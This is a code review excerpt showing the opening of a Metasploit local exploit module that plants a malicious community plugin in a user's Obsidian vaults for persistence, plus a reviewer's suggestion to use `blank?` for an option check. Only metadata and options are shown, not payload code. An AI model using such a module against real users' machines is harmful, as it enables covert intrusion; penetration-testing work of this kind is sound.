modules/exploits/multi/local/obsidian_plugin_persistence.rb

```diff
@@ -0,0 +1,243 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix # whoami
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Obsidian Plugin Persistence',
+        'Description' => %q{
+          This module searches for Obsidian vaults for a user, and uploads a malicious
+          community plugin to the vault. The vaults must be opened with community
+          plugins enabled (NOT restricted mode), but the plugin will be enabled
+          automatically.
+
+          Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # Module
+          'Thomas Byrne' # Research, PoC
+        ],
+        'DisclosureDate' => '2022-09-16',
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Privileged' => false,
+        'References' => [
+          [ 'URL', 'https://docs.obsidian.md/Plugins/Getting+started/Build+a+plugin' ],
+          [ 'URL', 'https://github.com/obsidianmd/obsidian-sample-plugin/tree/master' ],
+          [ 'URL', 'https://forum.obsidian.md/t/can-obsidian-plugins-have-malware/34491' ],
+          [ 'URL', 'https://help.obsidian.md/Extending+Obsidian/Plugin+security' ],
+          [ 'URL', 'https://thomas-byrne.co.uk/research/obsidian-malicious-plugins/obsidian-research/' ]
+        ],
+        'Arch' => [ARCH_CMD],
+        'Platform' => %w[osx linux windows],
+        'DefaultOptions' => {
+          # 25hrs, you know, just in case the user doesn't open Obsidian for a while
+          'WfsDelay' => 90_000,
+          'PrependMigrate' => true
+        },
+        'Targets' => [
+          ['Auto', {} ],
+          ['Linux', { 'Platform' => 'unix' } ],
+          ['OSX', { 'Platform' => 'osx' } ],
+          ['Windows', { 'Platform' => 'windows' } ],
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]
+        },
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options([
+      OptString.new('NAME', [ false, 'Name of the plugin', '' ]),
+      OptString.new('USER', [ false, 'User to target, or current user if blank', '' ]),
+      OptString.new('CONFIG', [ false, 'Config file location on target', '' ]),
+    ])
+  end
+
+  def plugin_name
+    return datastore['NAME'] unless datastore['NAME'].empty?
```

Comment:
It looks like the `NAME` option has no been defined as required and can be unset by the user. This would break here since its value would be `nil`. I suggest using `blank?` instead, which also checks if it is `nil`,
```suggestion
    return datastore['NAME'] unless datastore['NAME'].blank?
```